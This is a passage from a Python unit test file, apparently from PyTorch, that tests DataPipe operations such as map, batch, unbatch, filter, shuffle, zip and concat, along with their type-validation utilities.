# Replacing with multiple input columns and default output column (the left-most input column)
_helper(lambda data: (data[1], data[2] + data[0]), fn_n1, [2, 0])
_helper(lambda data: (data[0], (-data[2], -data[1], data[2] + data[1])), fn_nn, [2, 1])
# output_col can only be specified when input_col is not None
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, 1)
# output_col can only be single-element list or tuple
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, [0, 1])
# Single-element list as output_col
_helper(lambda data: (-data[1], data[1], data[2]), fn_11, 1, [0])
# Replacing with one input column and single specified output column
_helper(lambda data: (-data[1], data[1], data[2]), fn_11, 1, 0)
_helper(lambda data: (data[0], data[1], (-data[1], data[1])), fn_1n, 1, 2)
# The index of output column is out of range
with self.assertRaises(IndexError):
_helper(None, fn_1n, 1, 3)
_helper(lambda data: (data[0], data[0] + data[2], data[2]), fn_n1, [0, 2], 1)
_helper(lambda data: ((-data[1], -data[2], data[1] + data[2]), data[1], data[2]), fn_nn, [1, 2], 0)
# Appending the output at the end
_helper(lambda data: (*data, -data[1]), fn_11, 1, -1)
_helper(lambda data: (*data, (-data[1], data[1])), fn_1n, 1, -1)
_helper(lambda data: (*data, data[0] + data[2]), fn_n1, [0, 2], -1)
_helper(lambda data: (*data, (-data[1], -data[2], data[1] + data[2])), fn_nn, [1, 2], -1)
@suppress_warnings # Suppress warning for lambda fn
def test_map_dict_with_col_datapipe(self):
def fn_11(d):
return -d
def fn_1n(d):
return -d, d
def fn_n1(d0, d1):
return d0 + d1
def fn_nn(d0, d1):
return -d0, -d1, d0 + d1
# Prevent modification in-place to support resetting
def _dict_update(data, newdata, remove_idx=None):
_data = dict(data)
_data.update(newdata)
if remove_idx:
for idx in remove_idx:
del _data[idx]
return _data
def _helper(ref_fn, fn, input_col=None, output_col=None):
datapipe = dp.iter.IterableWrapper(
[{"x": 0, "y": 1, "z": 2},
{"x": 3, "y": 4, "z": 5},
{"x": 6, "y": 7, "z": 8}]
)
res_dp = datapipe.map(fn, input_col, output_col)
ref_dp = datapipe.map(ref_fn)
self.assertEqual(list(res_dp), list(ref_dp))
# Reset
self.assertEqual(list(res_dp), list(ref_dp))
# Replacing with one input column and default output column
_helper(lambda data: _dict_update(data, {"y": -data["y"]}), fn_11, "y")
_helper(lambda data: _dict_update(data, {"y": (-data["y"], data["y"])}), fn_1n, "y")
# The key of input column is not in dict
with self.assertRaises(KeyError):
_helper(None, fn_1n, "a")
# Unmatched input columns with fn arguments
with self.assertRaises(TypeError):
_helper(None, fn_n1, "y")
# Replacing with multiple input columns and default output column (the left-most input column)
_helper(lambda data: _dict_update(data, {"z": data["x"] + data["z"]}, ["x"]), fn_n1, ["z", "x"])
_helper(lambda data: _dict_update(data, {"z": (-data["z"], -data["y"], data["y"] + data["z"])}, ["y"]), fn_nn, ["z", "y"])
# output_col can only be specified when input_col is not None
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, "x")
# output_col can only be single-element list or tuple
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, ["x", "y"])
# Single-element list as output_col
_helper(lambda data: _dict_update(data, {"x": -data["y"]}), fn_11, "y", ["x"])
# Replacing with one input column and single specified output column
_helper(lambda data: _dict_update(data, {"x": -data["y"]}), fn_11, "y", "x")
_helper(lambda data: _dict_update(data, {"z": (-data["y"], data["y"])}), fn_1n, "y", "z")
_helper(lambda data: _dict_update(data, {"y": data["x"] + data["z"]}), fn_n1, ["x", "z"], "y")
_helper(lambda data: _dict_update(data, {"x": (-data["y"], -data["z"], data["y"] + data["z"])}), fn_nn, ["y", "z"], "x")
# Adding new key to dict for the output
_helper(lambda data: _dict_update(data, {"a": -data["y"]}), fn_11, "y", "a")
_helper(lambda data: _dict_update(data, {"a": (-data["y"], data["y"])}), fn_1n, "y", "a")
_helper(lambda data: _dict_update(data, {"a": data["x"] + data["z"]}), fn_n1, ["x", "z"], "a")
_helper(lambda data: _dict_update(data, {"a": (-data["y"], -data["z"], data["y"] + data["z"])}), fn_nn, ["y", "z"], "a")
# TODO(VitalyFedyunin): If dill installed this test fails
def _test_map_datapipe_nested_level(self):
input_dp = dp.iter.IterableWrapper([list(range(10)) for _ in range(3)])
def fn(item, *, dtype=torch.float):
return torch.tensor(item, dtype=dtype)
with warnings.catch_warnings(record=True) as wa:
map_dp = input_dp.map(lambda ls: ls * 2, nesting_level=0)
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"^Lambda function is not supported for pickle")
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, y * 2)
map_dp = input_dp.map(fn, nesting_level=1)
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(len(x), len(y))
for a, b in zip(x, y):
self.assertEqual(a, torch.tensor(b, dtype=torch.float))
map_dp = input_dp.map(fn, nesting_level=-1)
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(len(x), len(y))
for a, b in zip(x, y):
self.assertEqual(a, torch.tensor(b, dtype=torch.float))
map_dp = input_dp.map(fn, nesting_level=4)
with self.assertRaises(IndexError):
list(map_dp)
with self.assertRaises(ValueError):
input_dp.map(fn, nesting_level=-2)
def test_collate_datapipe(self):
arrs = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
input_dp = dp.iter.IterableWrapper(arrs)
def _collate_fn(batch):
return torch.tensor(sum(batch), dtype=torch.float)
collate_dp = input_dp.collate(collate_fn=_collate_fn)
self.assertEqual(len(input_dp), len(collate_dp))
for x, y in zip(collate_dp, input_dp):
self.assertEqual(x, torch.tensor(sum(y), dtype=torch.float))
input_dp_nl = IDP_NoLen(arrs)
collate_dp_nl = input_dp_nl.collate()
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(collate_dp_nl)
for x, y in zip(collate_dp_nl, input_dp_nl):
self.assertEqual(x, torch.tensor(y))
def test_batch_datapipe(self):
arrs = list(range(10))
input_dp = dp.iter.IterableWrapper(arrs)
with self.assertRaises(AssertionError):
input_dp.batch(batch_size=0)
# Default not drop the last batch
bs = 3
batch_dp = input_dp.batch(batch_size=bs)
self.assertEqual(len(batch_dp), 4)
for i, batch in enumerate(batch_dp):
self.assertEqual(len(batch), 1 if i == 3 else bs)
self.assertEqual(batch, arrs[i * bs: i * bs + len(batch)])
# Drop the last batch
bs = 4
batch_dp = input_dp.batch(batch_size=bs, drop_last=True)
self.assertEqual(len(batch_dp), 2)
for i, batch in enumerate(batch_dp):
self.assertEqual(len(batch), bs)
self.assertEqual(batch, arrs[i * bs: i * bs + len(batch)])
input_dp_nl = IDP_NoLen(range(10))
batch_dp_nl = input_dp_nl.batch(batch_size=2)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(batch_dp_nl)
def test_unbatch_datapipe(self):
target_length = 6
prebatch_dp = dp.iter.IterableWrapper(range(target_length))
input_dp = prebatch_dp.batch(3)
unbatch_dp = input_dp.unbatch()
self.assertEqual(len(list(unbatch_dp)), target_length)
for i, res in zip(prebatch_dp, unbatch_dp):
self.assertEqual(i, res)
input_dp = dp.iter.IterableWrapper([[0, 1, 2], [3, 4, 5]])
unbatch_dp = input_dp.unbatch()
self.assertEqual(len(list(unbatch_dp)), target_length)
for i, res in zip(prebatch_dp, unbatch_dp):
self.assertEqual(i, res)
input_dp = dp.iter.IterableWrapper([[[0, 1], [2, 3]], [[4, 5], [6, 7]]])
unbatch_dp = input_dp.unbatch()
expected_dp = [[0, 1], [2, 3], [4, 5], [6, 7]]
self.assertEqual(len(list(unbatch_dp)), 4)
for i, res in zip(expected_dp, unbatch_dp):
self.assertEqual(i, res)
unbatch_dp = input_dp.unbatch(unbatch_level=2)
expected_dp2 = [0, 1, 2, 3, 4, 5, 6, 7]
self.assertEqual(len(list(unbatch_dp)), 8)
for i, res in zip(expected_dp2, unbatch_dp):
self.assertEqual(i, res)
unbatch_dp = input_dp.unbatch(unbatch_level=-1)
self.assertEqual(len(list(unbatch_dp)), 8)
for i, res in zip(expected_dp2, unbatch_dp):
self.assertEqual(i, res)
input_dp = dp.iter.IterableWrapper([[0, 1, 2], [3, 4, 5]])
with self.assertRaises(ValueError):
unbatch_dp = input_dp.unbatch(unbatch_level=-2)
for i in unbatch_dp:
print(i)
with self.assertRaises(IndexError):
unbatch_dp = input_dp.unbatch(unbatch_level=5)
for i in unbatch_dp:
print(i)
def test_bucket_batch_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(20))
with self.assertRaises(AssertionError):
dp.iter.BucketBatcher(input_dp, batch_size=0)
input_dp_nl = IDP_NoLen(range(20))
bucket_dp_nl = dp.iter.BucketBatcher(input_dp_nl, batch_size=7)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(bucket_dp_nl)
def _helper(**kwargs):
data_len = 100
arrs = list(range(data_len))
random.shuffle(arrs)
input_dp = dp.iter.IterableWrapper(arrs)
bucket_dp = dp.iter.BucketBatcher(input_dp, **kwargs)
self.assertEqual(len(bucket_dp), data_len // 3 if kwargs['drop_last'] else data_len // 3 + 1)
def _verify_bucket_sorted(bucket):
# Sort batch in a bucket
bucket = sorted(bucket, key=lambda x: x[0])
flat = [item for batch in bucket for item in batch]
# Elements in the bucket should be sorted
self.assertEqual(flat, sorted(flat))
batch_num = kwargs['batch_num'] if 'batch_num' in kwargs else 100
bucket = []
for idx, d in enumerate(bucket_dp):
self.assertEqual(d, sorted(d))
bucket.append(d)
if idx % batch_num == batch_num - 1:
_verify_bucket_sorted(bucket)
bucket = []
_verify_bucket_sorted(bucket)
def _sort_fn(data):
return sorted(data)
# In-batch shuffle
_helper(batch_size=3, drop_last=False, batch_num=5, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=False, batch_num=2, bucket_num=2, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=True, batch_num=2, sort_key=_sort_fn)
_helper(batch_size=3, drop_last=True, batch_num=2, bucket_num=2, sort_key=_sort_fn)
def test_filter_datapipe(self):
input_ds = dp.iter.IterableWrapper(range(10))
def _filter_fn(data, val, clip=False):
if clip:
return data >= val
return True
filter_dp = input_ds.filter(filter_fn=_filter_fn, fn_args=(5, ))
for data, exp in zip(filter_dp, range(10)):
self.assertEqual(data, exp)
filter_dp = input_ds.filter(filter_fn=_filter_fn, fn_kwargs={'val': 5, 'clip': True})
for data, exp in zip(filter_dp, range(5, 10)):
self.assertEqual(data, exp)
with self.assertRaisesRegex(TypeError, r"has no len"):
len(filter_dp)
def _non_bool_fn(data):
return 1
filter_dp = input_ds.filter(filter_fn=_non_bool_fn)
with self.assertRaises(ValueError):
temp = list(filter_dp)
def test_filter_datapipe_nested_list(self):
input_ds = dp.iter.IterableWrapper(range(10)).batch(5)
def _filter_fn(data, val):
return data >= val
filter_dp = input_ds.filter(nesting_level=-1, filter_fn=_filter_fn, fn_kwargs={'val': 5})
expected_dp1 = [[5, 6, 7, 8, 9]]
self.assertEqual(len(list(filter_dp)), len(expected_dp1))
for data, exp in zip(filter_dp, expected_dp1):
self.assertEqual(data, exp)
filter_dp = input_ds.filter(nesting_level=-1, drop_empty_batches=False,
filter_fn=_filter_fn, fn_kwargs={'val': 5})
expected_dp2: List[List[int]] = [[], [5, 6, 7, 8, 9]]
self.assertEqual(len(list(filter_dp)), len(expected_dp2))
for data, exp in zip(filter_dp, expected_dp2):
self.assertEqual(data, exp)
with self.assertRaises(IndexError):
filter_dp = input_ds.filter(nesting_level=5, filter_fn=_filter_fn, fn_kwargs={'val': 5})
temp = list(filter_dp)
input_ds = dp.iter.IterableWrapper(range(10)).batch(3)
filter_dp = input_ds.filter(lambda ls: len(ls) >= 3)
expected_dp3: List[List[int]] = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
self.assertEqual(len(list(filter_dp)), len(expected_dp3))
for data, exp in zip(filter_dp, expected_dp3):
self.assertEqual(data, exp)
input_ds = dp.iter.IterableWrapper([[[0, 1, 2], [3, 4, 5]], [[6, 7, 8], [1, 2, 3]]])
filter_dp = input_ds.filter(lambda x: x > 3, nesting_level=-1)
expected_dp4 = [[[4, 5]], [[6, 7, 8]]]
self.assertEqual(len(list(filter_dp)), len(expected_dp4))
for data2, exp2 in zip(filter_dp, expected_dp4):
self.assertEqual(data2, exp2)
input_ds = dp.iter.IterableWrapper([[[0, 1, 2], [3, 4, 5]], [[6, 7, 8], [1, 2, 3]]])
filter_dp = input_ds.filter(lambda x: x > 7, nesting_level=-1)
expected_dp5 = [[[8]]]
self.assertEqual(len(list(filter_dp)), len(expected_dp5))
for data2, exp2 in zip(filter_dp, expected_dp5):
self.assertEqual(data2, exp2)
input_ds = dp.iter.IterableWrapper([[[0, 1], [3, 4]], [[6, 7, 8], [1, 2, 3]]])
filter_dp = input_ds.filter(lambda ls: len(ls) >= 3, nesting_level=1)
expected_dp6 = [[[6, 7, 8], [1, 2, 3]]]
self.assertEqual(len(list(filter_dp)), len(expected_dp6))
for data2, exp2 in zip(filter_dp, expected_dp6):
self.assertEqual(data2, exp2)
def test_sampler_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(10))
# Default SequentialSampler
sampled_dp = dp.iter.Sampler(input_dp) # type: ignore[var-annotated]
self.assertEqual(len(sampled_dp), 10)
for i, x in enumerate(sampled_dp):
self.assertEqual(x, i)
# RandomSampler
random_sampled_dp = dp.iter.Sampler(input_dp, sampler=RandomSampler, sampler_kwargs={'replacement': True}) # type: ignore[var-annotated] # noqa: B950
# Requires `__len__` to build SamplerDataPipe
input_dp_nolen = IDP_NoLen(range(10))
with self.assertRaises(AssertionError):
sampled_dp = dp.iter.Sampler(input_dp_nolen)
def test_shuffle_datapipe(self):
exp = list(range(20))
input_ds = dp.iter.IterableWrapper(exp)
with self.assertRaises(AssertionError):
shuffle_dp = input_ds.shuffle(buffer_size=0)
for bs in (5, 20, 25):
shuffle_dp = input_ds.shuffle(buffer_size=bs)
self.assertEqual(len(shuffle_dp), len(input_ds))
random.seed(123)
res = list(shuffle_dp)
self.assertEqual(sorted(res), exp)
# Test Deterministic
for num_workers in (0, 1):
random.seed(123)
dl = DataLoader(shuffle_dp, num_workers=num_workers, worker_init_fn=_worker_init_fn)
dl_res = list(dl)
self.assertEqual(res, dl_res)
shuffle_dp_nl = IDP_NoLen(range(20)).shuffle(buffer_size=5)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(shuffle_dp_nl)
def test_zip_datapipe(self):
with self.assertRaises(TypeError):
dp.iter.Zipper(dp.iter.IterableWrapper(range(10)), list(range(10))) # type: ignore[arg-type]
zipped_dp = dp.iter.Zipper(dp.iter.IterableWrapper(range(10)), IDP_NoLen(range(5))) # type: ignore[var-annotated]
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(zipped_dp)
exp = list((i, i) for i in range(5))
self.assertEqual(list(zipped_dp), exp)
zipped_dp = dp.iter.Zipper(dp.iter.IterableWrapper(range(10)), dp.iter.IterableWrapper(range(5)))
self.assertEqual(len(zipped_dp), 5)
self.assertEqual(list(zipped_dp), exp)
# Reset
self.assertEqual(list(zipped_dp), exp)
class TestFunctionalMapDataPipe(TestCase):
# TODO(VitalyFedyunin): If dill installed this test fails
def _test_picklable(self):
arr = range(10)
picklable_datapipes: List[
Tuple[Type[MapDataPipe], MapDataPipe, Tuple, Dict[str, Any]]
] = [
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (), {}),
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (_fake_fn, (0,), {'test': True}), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in picklable_datapipes:
p = pickle.dumps(dpipe(input_dp, *dp_args, **dp_kwargs)) # type: ignore[call-arg]
unpicklable_datapipes: List[
Tuple[Type[MapDataPipe], MapDataPipe, Tuple, Dict[str, Any]]
] = [
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (lambda x: x,), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in unpicklable_datapipes:
with warnings.catch_warnings(record=True) as wa:
datapipe = dpipe(input_dp, *dp_args, **dp_kwargs) # type: ignore[call-arg]
self.assertEqual(len(wa), 1)
self.assertRegex(
str(wa[0].message), r"^Lambda function is not supported for pickle"
)
with self.assertRaises(AttributeError):
p = pickle.dumps(datapipe)
def test_sequence_wrapper_datapipe(self):
seq = list(range(10))
input_dp = dp.map.SequenceWrapper(seq)
# Functional Test: all elements are equal in the same order
self.assertEqual(seq, list(input_dp))
# Functional Test: confirm deepcopy works by default
seq.append(11)
self.assertEqual(list(range(10)), list(input_dp)) # input_dp shouldn't have 11
# Functional Test: non-deepcopy version is working
seq2 = [1, 2, 3]
input_dp_non_deep = dp.map.SequenceWrapper(seq2, deepcopy=False)
seq2.append(4)
self.assertEqual(list(seq2), list(input_dp_non_deep)) # should have 4
# Reset Test: reset the DataPipe
seq = list(range(10))
n_elements_before_reset = 5
res_before_reset, res_after_reset = reset_after_n_next_calls(input_dp, n_elements_before_reset)
self.assertEqual(list(range(5)), res_before_reset)
self.assertEqual(seq, res_after_reset)
# __len__ Test: inherits length from sequence
self.assertEqual(len(seq), len(input_dp))
def test_concat_datapipe(self):
input_dp1 = dp.map.SequenceWrapper(range(10))
input_dp2 = dp.map.SequenceWrapper(range(5))
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.map.Concater()
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `MapDataPipe`"):
dp.map.Concater(input_dp1, ()) # type: ignore[arg-type]
concat_dp = input_dp1.concat(input_dp2)
self.assertEqual(len(concat_dp), 15)
for index in range(15):
self.assertEqual(concat_dp[index], (list(range(10)) + list(range(5)))[index])
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
def test_zip_datapipe(self):
input_dp1 = dp.map.SequenceWrapper(range(10))
input_dp2 = dp.map.SequenceWrapper(range(5))
input_dp3 = dp.map.SequenceWrapper(range(15))
# Functional Test: requires at least one input DataPipe
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.map.Zipper()
# Functional Test: all inputs must be MapDataPipes
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `MapDataPipe`"):
dp.map.Zipper(input_dp1, ()) # type: ignore[arg-type]
# Functional Test: Zip the elements up as a tuples
zip_dp = input_dp1.zip(input_dp2, input_dp3)
self.assertEqual([(i, i, i) for i in range(5)], [zip_dp[i] for i in range(5)])
# Functional Test: Raise IndexError when index equal or exceed the length of the shortest DataPipe
with self.assertRaisesRegex(IndexError, r"out of range"):
input_dp1.zip(input_dp2, input_dp3)[5]
# __len__ Test: returns the length of the shortest DataPipe
zip_dp = input_dp1.zip(input_dp2, input_dp3)
self.assertEqual(5, len(zip_dp))
def test_map_datapipe(self):
arr = range(10)
input_dp = dp.map.SequenceWrapper(arr)
def fn(item, dtype=torch.float, *, sum=False):
data = torch.tensor(item, dtype=dtype)
return data if not sum else data.sum()
map_dp = input_dp.map(fn)
self.assertEqual(len(input_dp), len(map_dp))
for index in arr:
self.assertEqual(
map_dp[index], torch.tensor(input_dp[index], dtype=torch.float)
)
map_dp = input_dp.map(fn=fn, fn_args=(torch.int,), fn_kwargs={'sum': True})
self.assertEqual(len(input_dp), len(map_dp))
for index in arr:
self.assertEqual(
map_dp[index], torch.tensor(input_dp[index], dtype=torch.int).sum()
)
from functools import partial
map_dp = input_dp.map(partial(fn, dtype=torch.int, sum=True))
self.assertEqual(len(input_dp), len(map_dp))
for index in arr:
self.assertEqual(
map_dp[index], torch.tensor(input_dp[index], dtype=torch.int).sum()
)
def test_batch_datapipe(self):
arr = list(range(13))
input_dp = dp.map.SequenceWrapper(arr)
# Functional Test: batches top level by default
batch_dp = dp.map.Batcher(input_dp, batch_size=2)
self.assertEqual([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11], [12]], list(batch_dp))
# Functional Test: drop_last on command
batch_dp = dp.map.Batcher(input_dp, batch_size=2, drop_last=True)
self.assertEqual([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]], list(batch_dp))
# Functional Test: nested batching
batch_dp_2 = batch_dp.batch(batch_size=3)
self.assertEqual([[[0, 1], [2, 3], [4, 5]], [[6, 7], [8, 9], [10, 11]]], list(batch_dp_2))
# Reset Test:
n_elements_before_reset = 3
res_before_reset, res_after_reset = reset_after_n_next_calls(batch_dp, n_elements_before_reset)
self.assertEqual([[0, 1], [2, 3], [4, 5]], res_before_reset)
self.assertEqual([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]], res_after_reset)
# __len__ Test:
self.assertEqual(6, len(batch_dp))
self.assertEqual(2, len(batch_dp_2))
# Metaclass conflict for Python 3.6
# Multiple inheritance with NamedTuple is not supported for Python 3.9
_generic_namedtuple_allowed = sys.version_info >= (3, 7) and sys.version_info < (3, 9)
if _generic_namedtuple_allowed:
class InvalidData(Generic[T_co], NamedTuple):
name: str
data: T_co
class TestTyping(TestCase):
def test_subtype(self):
from torch.utils.data._typing import issubtype
basic_type = (int, str, bool, float, complex,
list, tuple, dict, set, T_co)
for t in basic_type:
self.assertTrue(issubtype(t, t))
self.assertTrue(issubtype(t, Any))
if t == T_co:
self.assertTrue(issubtype(Any, t))
else:
self.assertFalse(issubtype(Any, t))
for t1, t2 in itertools.product(basic_type, basic_type):
if t1 == t2 or t2 == T_co:
self.assertTrue(issubtype(t1, t2))
else:
self.assertFalse(issubtype(t1, t2))
T = TypeVar('T', int, str)
S = TypeVar('S', bool, Union[str, int], Tuple[int, T]) # type: ignore[valid-type]
types = ((int, Optional[int]),
(List, Union[int, list]),
(Tuple[int, str], S),
(Tuple[int, str], tuple),
(T, S),
(S, T_co),
(T, Union[S, Set]))
for sub, par in types:
self.assertTrue(issubtype(sub, par))
self.assertFalse(issubtype(par, sub))
subscriptable_types = {
List: 1,
Tuple: 2, # use 2 parameters
Set: 1,
Dict: 2,
}
for subscript_type, n in subscriptable_types.items():
for ts in itertools.combinations(types, n):
subs, pars = zip(*ts)
sub = subscript_type[subs] # type: ignore[index]
par = subscript_type[pars] # type: ignore[index]
self.assertTrue(issubtype(sub, par))
self.assertFalse(issubtype(par, sub))
# Non-recursive check
self.assertTrue(issubtype(par, sub, recursive=False))
def test_issubinstance(self):
from torch.utils.data._typing import issubinstance
basic_data = (1, '1', True, 1., complex(1., 0.))
basic_type = (int, str, bool, float, complex)
S = TypeVar('S', bool, Union[str, int])
for d in basic_data:
self.assertTrue(issubinstance(d, Any))
self.assertTrue(issubinstance(d, T_co))
if type(d) in (bool, int, str):
self.assertTrue(issubinstance(d, S))
else:
self.assertFalse(issubinstance(d, S))
for t in basic_type:
if type(d) == t:
self.assertTrue(issubinstance(d, t))
else:
self.assertFalse(issubinstance(d, t))
# list/set
dt = (([1, '1', 2], List), (set({1, '1', 2}), Set))
for d, t in dt:
self.assertTrue(issubinstance(d, t))
self.assertTrue(issubinstance(d, t[T_co])) # type: ignore[index]
self.assertFalse(issubinstance(d, t[int])) # type: ignore[index]
# dict
d = dict({'1': 1, '2': 2.})
self.assertTrue(issubinstance(d, Dict))
self.assertTrue(issubinstance(d, Dict[str, T_co]))
self.assertFalse(issubinstance(d, Dict[str, int]))
# tuple
d = (1, '1', 2)
self.assertTrue(issubinstance(d, Tuple))
self.assertTrue(issubinstance(d, Tuple[int, str, T_co]))
self.assertFalse(issubinstance(d, Tuple[int, Any]))
self.assertFalse(issubinstance(d, Tuple[int, int, int]))
# Static checking annotation
def test_compile_time(self):
with self.assertRaisesRegex(TypeError, r"Expected 'Iterator' as the return"):
class InvalidDP1(IterDataPipe[int]):
def __iter__(self) -> str: # type: ignore[misc, override]
yield 0
with self.assertRaisesRegex(TypeError, r"Expected return type of '__iter__'"):
class InvalidDP2(IterDataPipe[Tuple]):
def __iter__(self) -> Iterator[int]: # type: ignore[override]
yield 0
with self.assertRaisesRegex(TypeError, r"Expected return type of '__iter__'"):
class InvalidDP3(IterDataPipe[Tuple[int, str]]):
def __iter__(self) -> Iterator[tuple]: # type: ignore[override]
yield (0, )
if _generic_namedtuple_allowed:
with self.assertRaisesRegex(TypeError, r"is not supported by Python typing"):
class InvalidDP4(IterDataPipe["InvalidData[int]"]): # type: ignore[type-arg, misc]
pass
class DP1(IterDataPipe[Tuple[int, str]]):
def __init__(self, length):
self.length = length
def __iter__(self) -> Iterator[Tuple[int, str]]:
for d in range(self.length):
yield d, str(d)
self.assertTrue(issubclass(DP1, IterDataPipe))
dp1 = DP1(10)
self.assertTrue(DP1.type.issubtype(dp1.type) and dp1.type.issubtype(DP1.type))
dp1_ = DP1(5)
self.assertEqual(dp1.type, dp1_.type)
with self.assertRaisesRegex(TypeError, r"is not a generic class"):
class InvalidDP5(DP1[tuple]): # type: ignore[type-arg]
def __iter__(self) -> Iterator[tuple]: # type: ignore[override]
yield (0, )
class DP2(IterDataPipe[T_co]):
def __iter__(self) -> Iterator[T_co]:
for d in range(10):
yield d # type: ignore[misc]
self.assertTrue(issubclass(DP2, IterDataPipe))
dp2 = DP2() # type: ignore[var-annotated]
self.assertTrue(DP2.type.issubtype(dp2.type) and dp2.type.issubtype(DP2.type))
dp2_ = DP2() # type: ignore[var-annotated]
self.assertEqual(dp2.type, dp2_.type)
class DP3(IterDataPipe[Tuple[T_co, str]]):
r""" DataPipe without fixed type with __init__ function"""
def __init__(self, datasource):
self.datasource = datasource
def __iter__(self) -> Iterator[Tuple[T_co, str]]:
for d in self.datasource:
yield d, str(d)
self.assertTrue(issubclass(DP3, IterDataPipe))
dp3 = DP3(range(10)) # type: ignore[var-annotated]
self.assertTrue(DP3.type.issubtype(dp3.type) and dp3.type.issubtype(DP3.type))
dp3_ = DP3(5) # type: ignore[var-annotated]
self.assertEqual(dp3.type, dp3_.type)
class DP4(IterDataPipe[tuple]):
r""" DataPipe without __iter__ annotation"""
def __iter__(self):
raise NotImplementedError
self.assertTrue(issubclass(DP4, IterDataPipe))
dp4 = DP4()
self.assertTrue(dp4.type.param == tuple)
class DP5(IterDataPipe):
r""" DataPipe without type annotation"""
def __iter__(self) -> Iterator[str]:
raise NotImplementedError
self.assertTrue(issubclass(DP5, IterDataPipe))
dp5 = DP5()
from torch.utils.data._typing import issubtype
self.assertTrue(issubtype(dp5.type.param, Any) and issubtype(Any, dp5.type.param))
class DP6(IterDataPipe[int]):
r""" DataPipe with plain Iterator"""
def __iter__(self) -> Iterator:
raise NotImplementedError
self.assertTrue(issubclass(DP6, IterDataPipe))
dp6 = DP6()
self.assertTrue(dp6.type.param == int)
class DP7(IterDataPipe[Awaitable[T_co]]):
r""" DataPipe with abstract base class"""
self.assertTrue(issubclass(DP7, IterDataPipe))
self.assertTrue(DP7.type.param == Awaitable[T_co])
class DP8(DP7[str]):
r""" DataPipe subclass from a DataPipe with abc type"""
self.assertTrue(issubclass(DP8, IterDataPipe))
self.assertTrue(DP8.type.param == Awaitable[str])
def test_construct_time(self):
class DP0(IterDataPipe[Tuple]):
@argument_validation
def __init__(self, dp: IterDataPipe):
self.dp = dp
def __iter__(self) -> Iterator[Tuple]:
for d in self.dp:
yield d, str(d)
class DP1(IterDataPipe[int]):
@argument_validation
def __init__(self, dp: IterDataPipe[Tuple[int, str]]):
self.dp = dp
def __iter__(self) -> Iterator[int]:
for a, b in self.dp:
yield a
# Non-DataPipe input with DataPipe hint
datasource = [(1, '1'), (2, '2'), (3, '3')]
with self.assertRaisesRegex(TypeError, r"Expected argument 'dp' as a IterDataPipe"):
dp0 = DP0(datasource)
dp0 = DP0(dp.iter.IterableWrapper(range(10)))
with self.assertRaisesRegex(TypeError, r"Expected type of argument 'dp' as a subtype"):
dp1 = DP1(dp0)
def test_runtime(self):
class DP(IterDataPipe[Tuple[int, T_co]]):
def __init__(self, datasource):
self.ds = datasource
@runtime_validation
def __iter__(self) -> Iterator[Tuple[int, T_co]]:
for d in self.ds:
yield d
dss = ([(1, '1'), (2, '2')],
[(1, 1), (2, '2')])
for ds in dss:
dp0 = DP(ds) # type: ignore[var-annotated]
self.assertEqual(list(dp0), ds)
# Reset __iter__
self.assertEqual(list(dp0), ds)
dss = ([(1, 1), ('2', 2)], # type: ignore[assignment, list-item]
[[1, '1'], [2, '2']], # type: ignore[list-item]
[1, '1', 2, '2'])
for ds in dss:
dp0 = DP(ds)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp0)
with runtime_validation_disabled():
self.assertEqual(list(dp0), ds)
with runtime_validation_disabled():
self.assertEqual(list(dp0), ds)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp0)
def test_reinforce(self):
T = TypeVar('T', int, str)
class DP(IterDataPipe[T]):
def __init__(self, ds):
self.ds = ds
@runtime_validation
def __iter__(self) -> Iterator[T]:
for d in self.ds:
yield d
ds = list(range(10))
# Valid type reinforcement
dp0 = DP(ds).reinforce_type(int)
self.assertTrue(dp0.type, int)
self.assertEqual(list(dp0), ds)
# Invalid type
with self.assertRaisesRegex(TypeError, r"'expected_type' must be a type"):
dp1 = DP(ds).reinforce_type(1)
# Type is not subtype
with self.assertRaisesRegex(TypeError, r"Expected 'expected_type' as subtype of"):
dp2 = DP(ds).reinforce_type(float)
# Invalid data at runtime
dp3 = DP(ds).reinforce_type(str)
with self.assertRaisesRegex(RuntimeError, r"Expected an instance as subtype"):
list(dp3)
# Context Manager to disable the runtime validation
with runtime_validation_disabled():
self.assertEqual(list(d for d in dp3), ds)
class NumbersDataset(IterDataPipe):
def __init__(self, size=10):
self.size = size
def __iter__(self):
for i in range(self.size):
yield i
class TestGraph(TestCase):
@skipIfNoDill
def test_simple_traverse(self):
numbers_dp = NumbersDataset(size=50)
mapped_dp = numbers_dp.map(lambda x: x * 10)
graph = torch.utils.data.graph.traverse(mapped_dp)
